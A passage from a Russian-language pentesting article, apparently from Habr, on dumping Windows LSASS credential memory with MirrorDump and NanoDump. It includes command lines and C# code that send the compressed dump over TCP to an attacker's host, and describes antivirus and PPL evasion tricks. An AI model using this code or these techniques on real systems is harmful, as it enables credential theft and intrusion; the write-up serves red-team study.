\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f <a href=\"https:\/\/twitter.com\/_EthicalChaos_\">@_EthicalChaos_<\/a>.<\/p>\n<p>\u0415\u0433\u043e \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438:<\/p>\n<ul>\n<li>\n<p>\u041d\u0430\u043f\u0438\u0441\u0430\u043d \u043d\u0430 C#, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0435\u0433\u043e \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441\u0435\u0441\u0441\u0438\u0438 <a href=\"https:\/\/attack.mitre.org\/tactics\/TA0011\/\">C2<\/a> \u0438\u043b\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 .NET <code>Reflection.Assembly<\/code>.<\/p>\n<\/li>\n<li>\n<p>\u041f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 \u043c\u0430\u0433\u0438\u044e <a href=\"https:\/\/github.com\/boo-lang\/boo\">Boo.Lang<\/a> \u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u0430 <a href=\"https:\/\/github.com\/3F\/DllExport\">DllExport<\/a> \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u00ab\u043d\u0430 \u043b\u0435\u0442\u0443\u00bb \u043f\u0441\u0435\u0432\u0434\u043e\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 LSA SSP \u0438 \u0435\u0433\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432 \u043f\u0430\u043c\u044f\u0442\u044c LSASS \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u0432\u043c\u0435\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f API <a href=\"http:\/\/undocumented.ntinternals.net\/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProcess%2FNtOpenProcess.html\">NtOpenProcess.<\/a><\/p>\n<\/li>\n<li>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043f\u0440\u043e\u0435\u043a\u0442\u044b <a href=\"https:\/\/github.com\/TsudaKageyu\/minhook\">MiniHook<\/a> \u0438 <a href=\"https:\/\/github.com\/spazzarama\/SharpDisasm\">SharpDisasm<\/a> \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 userland-\u0445\u0443\u043a\u043e\u0432 \u043d\u0430 \u0432\u044b\u0437\u043e\u0432\u044b \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 API <code>MiniDumpWriteDump<\/code> \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e\u0442\u043e\u043a\u0430 \u0431\u0430\u0439\u0442 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0438\u0440\u0443\u044e\u0449\u0435\u0433\u043e \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 lsass.exe \u0432 \u043f\u0430\u043c\u044f\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0443 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0430 \u043f\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0434\u0430\u043c\u043f \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u043e \u0441\u0435\u0442\u0438 \u0438 \u043d\u0435 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0442\u044c \u0435\u0433\u043e \u043d\u0430 \u0434\u0438\u0441\u043a \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430.<\/p>\n<\/li>\n<\/ul>\n<p>\u0412 \u043c\u0438\u043d\u0443\u0441\u044b \u044d\u0442\u043e\u0433\u043e \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u0431\u0435\u0437\u0443\u0441\u043b\u043e\u0432\u043d\u043e \u0432\u0445\u043e\u0434\u0438\u0442 \u0442\u043e, \u0447\u0442\u043e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 DLL \u043f\u0441\u0435\u0432\u0434\u043e\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 LSA <strong>\u0434\u043e\u043b\u0436\u043d\u0430<\/strong> \u0431\u044b\u0442\u044c \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0430 \u043d\u0430 \u0434\u0438\u0441\u043a \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430 \u0434\u043b\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432 API <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/ntsecpkg\/nc-ntsecpkg-splsamodeinitializefn\">SpLsaModeInitialize<\/a>, \u0438 \u043a\u043e\u0442\u043e\u0440\u0430\u044f, \u043a\u043e \u0432\u0441\u0435\u043c\u0443 \u043f\u0440\u043e\u0447\u0435\u043c\u0443, \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u0430 \u043f\u043e\u0441\u043b\u0435 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0434\u0430\u043c\u043f\u0430 \u0431\u0435\u0437 \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u041f\u041a.<\/p>\n<p>\u0414\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0435\u043a\u0442 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043a\u0430\u043a Proof-of-Concept, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u00ab\u0438\u0437 \u043a\u043e\u0440\u043e\u0431\u043a\u0438\u00bb \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0434\u0430\u043c\u043f \u043f\u0430\u043c\u044f\u0442\u0438 \u043d\u0430 \u0434\u0438\u0441\u043a \u0434\u0430\u0436\u0435 \u0441 \u0443\u0447\u0435\u0442\u043e\u043c \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044f \u0442\u0430\u043a\u043e\u0433\u043e \u0434\u0430\u043c\u043f\u0430 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0442 \u0441\u0442\u043e\u043b\u044c \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u0440\u0435\u0448\u0438\u043b \u0441\u0434\u0435\u043b\u0430\u0442\u044c <a href=\"https:\/\/github.com\/snovvcrash\/MirrorDump\">\u0441\u0432\u043e\u0439 \u0444\u043e\u0440\u043a<\/a>, \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \u0434\u0432\u0435 \u043d\u043e\u0432\u044b\u0435 \u0444\u0438\u0447\u0438:<\/p>\n<ol>\n<li>\n<p>\u041f\u0430\u0440\u0441\u0438\u043d\u0433 \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u0440\u044f\u043c\u043e \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 <a href=\"https:\/\/github.com\/cube0x0\/MiniDump\">MiniDump<\/a> (\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0435 \u043d\u0430 \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u041e\u0421 Windows).<\/p>\n<\/li>\n<li>\n<p>\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0441\u0436\u0430\u0442\u0438\u044f \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0431\u0430\u0439\u0442 \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u043e TCP-\u043a\u0430\u043d\u0430\u043b\u0443 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e, \u0433\u0434\u0435 \u043f\u0430\u0440\u0441\u0438\u043d\u0433 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0434\u0435\u043d \u0441\u0438\u043b\u0430\u043c\u0438 \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 (Mimikatz \/ Pypykatz).<\/p>\n<\/li>\n<\/ol>\n<p>\u0414\u043b\u044f \u043f\u0435\u0440\u0432\u043e\u0439 \u0444\u0438\u0447\u0438 \u0431\u044b\u043b \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d <a href=\"https:\/\/github.com\/snovvcrash\/MirrorDump\/blob\/45aa9057aa152ed3682dd9410de4ff731b851c74\/Program.cs#L105\">\u0444\u043b\u0430\u0433<\/a> <code>--parse<\/code>, \u043f\u0440\u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0431\u0430\u0439\u0442\u044b \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u043d\u0430 <a href=\"https:\/\/github.com\/snovvcrash\/MiniDump\/blob\/5e7cc10889dedffc94cb5efb4d7638c8f1e679ef\/Program.cs#L25\">EntryPoint<\/a> MiniDump.<\/p>\n<details class=\"spoiler\">\n<summary>Cmd<\/summary>\n<div class=\"spoiler__content\">\n<pre><code>C:\\>MirrorDump.exe --dllName LegitLSAPlugin1.dll --parse<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/7aa\/70d\/79c\/7aa70d79c16f66e65994390f0cabbb99.png\" alt=\"\u0411\u0435\u0441\u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0439 \u0434\u0430\u043c\u043f LSASS \u0441 \u043f\u0430\u0440\u0441\u0438\u043d\u0433\u043e\u043c \u0441\u043b\u0435\u043f\u043a\u0430 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438\" title=\"\u0411\u0435\u0441\u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0439 \u0434\u0430\u043c\u043f LSASS \u0441 \u043f\u0430\u0440\u0441\u0438\u043d\u0433\u043e\u043c \u0441\u043b\u0435\u043f\u043a\u0430 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438\" width=\"1179\" height=\"724\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/7aa\/70d\/79c\/7aa70d79c16f66e65994390f0cabbb99.png\"\/><figcaption>\u0411\u0435\u0441\u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0439 \u0434\u0430\u043c\u043f LSASS \u0441 \u043f\u0430\u0440\u0441\u0438\u043d\u0433\u043e\u043c \u0441\u043b\u0435\u043f\u043a\u0430 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438<\/figcaption><\/figure>\n<p>\u0414\u043b\u044f \u0432\u0442\u043e\u0440\u043e\u0439 \u0444\u0438\u0447\u0438 \u0431\u044b\u043b \u043d\u0430\u043f\u0438\u0441\u0430\u043d \u0432\u0441\u043f\u043e\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 <a href=\"https:\/\/github.com\/snovvcrash\/MirrorDump\/blob\/master\/MirrorDump.py\">\u0441\u043a\u0440\u0438\u043f\u0442<\/a> \u043d\u0430 Python, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0442\u0440\u0438\u0432\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u043e\u043a\u0435\u0442-\u0441\u0435\u0440\u0432\u0435\u0440, \u043e\u0436\u0438\u0434\u0430\u044e\u0449\u0438\u0439 \u00ab\u0437\u0438\u043f\u043f\u043e\u0432\u0430\u043d\u043d\u044b\u0439\u00bb \u0434\u0430\u043c\u043f. \u0421\u043a\u0440\u0438\u043f\u0442 \u0442\u0430\u043a\u0436\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0440\u0430\u0441\u043f\u0430\u043a\u0443\u0435\u0442 \u043f\u0440\u0438\u043b\u0435\u0442\u0435\u0432\u0448\u0438\u0439 \u0434\u0430\u043c\u043f, \u043f\u043e \u0436\u0435\u043b\u0430\u043d\u0438\u044e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c\u043d\u0443\u044e \u0441\u0443\u043c\u043c\u0443 \u0438 \u0440\u0430\u0441\u043f\u0440\u0430\u0441\u0438\u0442 \u0435\u0433\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Pypykatz.<\/p>\n<details class=\"spoiler\">\n<summary>Cmd<\/summary>\n<div class=\"spoiler__content\">\n<pre><code>~$ python3 MirrorDump.py 0.0.0.0 1337 --md5 --parse C:\\>MirrorDump.exe --dllName LegitLSAPlugin1.dll --host 192.168.0.184 --port 1337<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/0ef\/35f\/b00\/0ef35fb003943bff91eaf56d0eadb52b.png\" alt=\"\u0411\u0435\u0441\u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0439 \u0434\u0430\u043c\u043f LSASS \u0441 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u043e\u0439 \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u043e TCP\" title=\"\u0411\u0435\u0441\u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0439 \u0434\u0430\u043c\u043f LSASS \u0441 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u043e\u0439 \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u043e TCP\" width=\"1112\" height=\"795\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/0ef\/35f\/b00\/0ef35fb003943bff91eaf56d0eadb52b.png\"\/><figcaption>\u0411\u0435\u0441\u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0439 \u0434\u0430\u043c\u043f LSASS \u0441 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u043e\u0439 \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u043e TCP<\/figcaption><\/figure>\n<p>\u041e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u0437\u0430\u043f\u0430\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u0430\u043c\u043f\u0430 \u0442\u0430\u043a\u0436\u0435 \u043b\u0435\u0433\u043a\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0430 \u043d\u0430\u0442\u0438\u0432\u043d\u043e\u043c C# \u0447\u0435\u0440\u0435\u0437 \u043c\u0435\u0442\u043e\u0434 <code>SendZip<\/code>.<\/p>\n<pre><code class=\"cs\">static void SendZip(string host, int port, DumpContext dc) {     using (var outStream = new MemoryStream())     {         using (var archive = new ZipArchive(outStream, ZipArchiveMode.Create, true))         {             var lsassDump = archive.CreateEntry($\"{Guid.NewGuid()}.bin\");             using (var entryStream = lsassDump.Open())                 using (var dumpCompressStream = new MemoryStream(dc.Data))                     dumpCompressStream.CopyTo(entryStream);         }          byte[] compressedBytes = outStream.ToArray();          Console.WriteLine($\"[+] Minidump successfully packed in memory, size {Math.Round(compressedBytes.Length \/ 1024.0 \/ 1024.0, 2)} MB\");          byte[] zipHashBytes = MD5.Create().ComputeHash(compressedBytes);         string zipHash = BitConverter.ToString(zipHashBytes).Replace(\"-\", \"\");          Console.WriteLine($\"[*] MD5: {zipHash}\");          using (var tcpClient = new TcpClient(host, port))         {             using (var netStream = tcpClient.GetStream())             {                 string hostName = System.Environment.GetEnvironmentVariable(\"COMPUTERNAME\");                 string zipSize = (compressedBytes.Length).ToString();                 byte[] stage = Encoding.ASCII.GetBytes($\"{hostName}|{zipSize}\");                 netStream.Write(stage, 0, stage.Length);                 netStream.Write(compressedBytes, 0, compressedBytes.Length);             }         }     } }<\/code><\/pre>\n<p>\u0422\u0430\u043a\u0436\u0435 \u043c\u0435\u0442\u043e\u0434 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0441\u043b\u0435\u043f\u043a\u043e\u0432 lsass.exe \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e MirrorDump <a href=\"https:\/\/github.com\/Hackndo\/lsassy\/blob\/master\/lsassy\/dumpmethod\/mirrordump.py\">\u0431\u044b\u043b \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d<\/a> \u043c\u043d\u043e\u0439 \u0434\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 lsassy.<\/p>\n<p>\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u043d\u0435\u0434\u043e\u043b\u0433\u043e \u043c\u0443\u0437\u044b\u043a\u0430 \u0438\u0433\u0440\u0430\u043b\u0430 \u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u043f\u043e\u043b\u0433\u043e\u0434\u0430 \u0441\u043f\u0443\u0441\u0442\u044f \u00ab\u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u0438\u0439\u00bb \u043d\u0430\u0447\u0430\u043b \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0434\u0430\u043c\u043f\u043e\u0432 LSASS \u0447\u0435\u0440\u0435\u0437 \u0434\u0430\u043d\u043d\u0443\u044e \u0442\u0435\u0445\u043d\u0438\u043a\u0443 \u043d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430, \u0447\u0442\u043e \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u043b\u043e \u043d\u0430\u0441 \u0438\u0441\u043a\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u043e\u0439 \u00ab\u043d\u0435\u043f\u0430\u043b\u044f\u0449\u0438\u0439\u0441\u044f\u00bb \u0441\u043f\u043e\u0441\u043e\u0431 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u043a\u0440\u0435\u0434 \u043d\u0430 \u0432\u043d\u0443\u0442\u0440\u044f\u043a\u0430\u0445.<\/p>\n<h3>NanoDump<\/h3>\n<p>\u041d\u0430\u0448\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u00ab\u0441\u043f\u0430\u0441\u0438\u0442\u0435\u043b\u0435\u043c\u00bb \u0441\u0442\u0430\u043b \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 <a href=\"https:\/\/github.com\/helpsystems\/nanodump\">NanoDump<\/a> \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438-\u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 Cobalt Strike, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f \u0431\u0435\u0437 \u043f\u0440\u0435\u0443\u0432\u0435\u043b\u0438\u0447\u0435\u043d\u0438\u0439 \u0441\u0447\u0438\u0442\u0430\u044e \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0434\u0435\u043d\u0438\u0435\u043c \u0438\u0441\u043a\u0443\u0441\u0441\u0442\u0432\u0430.<\/p>\n<p>\u0415\u0433\u043e \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438:<\/p>\n<ul>\n<li>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u0432\u044b\u0437\u043e\u0432\u043e\u0432 (\u0441 \u0438\u0445 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u0440\u0435\u0437\u043e\u043b\u0432\u043e\u043c) \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <a href=\"https:\/\/github.com\/jthuraisamy\/SysWhispers2\">SysWhispers2<\/a>, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c userland-\u0445\u0443\u043a\u0438 Win32 API, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0435\u0448\u0430\u0435\u0442 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0435 \u041f\u041e.<\/p>\n<\/li>\n<li>\n<p>\u0421\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f MiniDumpWriteDump \u0447\u0435\u0440\u0435\u0437 \u0447\u0442\u0435\u043d\u0438\u0435 \u043f\u0430\u043c\u044f\u0442\u0438 lsass.exe \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ZwReadVirtualMemory, \u0447\u0442\u043e \u0438\u0437\u0431\u0430\u0432\u043b\u044f\u0435\u0442 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0430 \u043e\u0442 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u0435\u0440\u0433\u0430\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0440\u0443\u0447\u043a\u0443 API.<\/p>\n<\/li>\n<li>\n<p>\u041f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u0440\u0430\u0437\u043d\u044b\u0445 \u0442\u0440\u044e\u043a\u043e\u0432 \u0438 \u0442\u0435\u0445\u043d\u0438\u043a \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0434\u0430\u043c\u043f\u0430 (\u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u044b \u043d\u0435 \u0432\u0441\u0435):<\/p>\n<ul>\n<li>\n<p>\u043f\u043e\u0438\u0441\u043a \u0443\u0436\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u043e\u0432 lsass.exe \u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430\u0445 [<a href=\"https:\/\/skelsec.medium.com\/duping-av-with-handles-537ef985eb03\">\u0441\u0441\u044b\u043b\u043a\u0430<\/a>],<\/p>\n<\/li>\n<li>\n<p>\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u0442\u0435\u043a\u0430\u044e\u0449\u0435\u0433\u043e \u0445\u044d\u043d\u0434\u043b\u0430 lsass.exe \u043f\u0440\u0438 \u0432\u044b\u0437\u043e\u0432\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <code>CreateProcessWithLogonW<\/code> [<a href=\"https:\/\/splintercod3.blogspot.com\/p\/the-hidden-side-of-seclogon-part-2.html\">\u0441\u0441\u044b\u043b\u043a\u0430<\/a>],<\/p>\n<\/li>\n<li>\n<p>\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 NanoDump \u0432 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c lsass.exe \u0432 \u0432\u0438\u0434\u0435 \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430 SSP [<a href=\"https:\/\/blog.xpnsec.com\/exploring-mimikatz-part-2\/\">\u0441\u0441\u044b\u043b\u043a\u0430<\/a>],<\/p>\n<\/li>\n<li>\n<p>\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0441\u043d\u044f\u0442\u0438\u044f \u0437\u0430\u0449\u0438\u0442\u044b PPL [<a href=\"https:\/\/blog.scrt.ch\/2021\/04\/22\/bypassing-lsa-protection-in-userland\/\">\u0441\u0441\u044b\u043b\u043a\u0430<\/a>].<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>\u041d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u043e\u0435 \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u0441\u0438\u0433\u043d\u0430\u0442\u0443\u0440\u044b \u0434\u0430\u043c\u043f\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441 \u0446\u0435\u043b\u044c\u044e \u0438\u0437\u0431\u0435\u0433\u0430\u043d\u0438\u044f \u0434\u0435\u0442\u0435\u043a\u0442\u0430 \u043e\u0442 AV \u043d\u0430 \u044d\u0442\u0430\u043f\u0435 \u0435\u0433\u043e \u0437\u0430\u043f\u0438\u0441\u0438 \u043d\u0430 \u0434\u0438\u0441\u043a.<\/p>\n<\/li>\n<li>\n<p>\u041a\u043e\u043c\u043f\u0438\u043b\u044f\u0446\u0438\u044f \u0432 Beacon Object File (BOF) \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f NanoDump \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435, \u043a\u043e\u0433\u0434\u0430 \u043c\u043e\u0434\u0435\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043e\u0431\u043b\u0430\u0434\u0430\u0435\u0442 \u0441\u0435\u0441\u0441\u0438\u0435\u0439 \u00ab\u041a\u043e\u0431\u0430\u043b\u044c\u0442\u0430\u00bb \u043d\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0441\u0435\u0442\u0435\u0432\u043e\u043c \u0443\u0437\u043b\u0435.<\/p>\n<\/li>\n<\/ul>\n<p>\u0414\u043b\u044f \u043d\u0430\u0441, \u043a\u0430\u043a \u0434\u043b\u044f \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435\u0440\u043e\u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0438\u0437 \u0440\u0443-\u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0430, \u043d\u0430\u0438\u0431\u043e\u043b\u044c\u0448\u0438\u0439 